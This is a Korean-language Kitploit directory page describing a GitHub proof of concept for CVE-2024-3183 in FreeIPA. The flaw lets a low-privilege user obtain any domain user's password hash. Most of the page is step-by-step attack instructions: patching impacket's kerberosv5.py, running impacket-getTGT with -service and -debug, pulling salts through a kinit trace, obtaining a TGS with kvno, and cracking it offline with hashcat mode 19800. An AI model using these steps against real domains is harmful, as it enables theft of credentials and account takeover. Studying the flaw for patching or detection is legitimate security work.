Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-3183-POC — CVE-2024-3183 (FreeIPA Rosting)에 대한 PoC | Kitploit
도구/GitHubGitHub/im10n/cve-2024-3183-poc
Password AttacksVulnerability AnalysisExploitationPenetration TestingAuthentication
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

CVE-2024-3183 (FreeIPA Rosting)에 대한 PoC

저장소 보기
29242년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-3183-POC

CVE-2024-3183 (FreeIPA Rosting)에 대한 POC

영향: 저권한 사용자가 모든 도메인 사용자의 비밀번호 해시를 획득하고 오프라인 무차별 대입 공격(kerberoasting)을 수행할 수 있습니다.

impacket-getTGT 패치:

  1. impacket/krb5/kerberosv5.py에 decoder.decode.defaultErrorState = stGetValueDecoderByTag를 추가합니다.
  2. 즐기세요!

POC1:

  1. impacket/krb5/kerberosv5.py에 decoder.decode.defaultErrorState = stGetValueDecoderByTag를 추가합니다.
  2. 하나의 명령어로 salt를 얻기 위해 -service 옵션과 -debug 옵션과 함께 impacket-getTGT를 사용할 수 있습니다. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. 먼저, 이미 손상된 사용자 "admin"에 대한 TGT 티켓을 요청합니다. kinit user foto1
  2. 둘째로, "admin" 사용자의 salt를 알아냅니다: printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. "admin"에 대한 TGS를 획득합니다: kvno admin foto foto3
  4. TGS 무차별 대입 공격을 위해 python 스크립트(또는 특정 salt를 사용한 hashcat 모드 19800)를 사용합니다. foto4

1 - TGS, 2 - SALT, 3 - 비밀번호.

  1. 축하합니다, 이제 사용자 비밀번호 “admin”을 획득했습니다.

POC3:

  1. 한 번의 동작으로 kinit를 사용할 수 있습니다: kinit -S target user

그러면 대상 사용자 키로 암호화된 TGT를 얻습니다.

도구 다운로드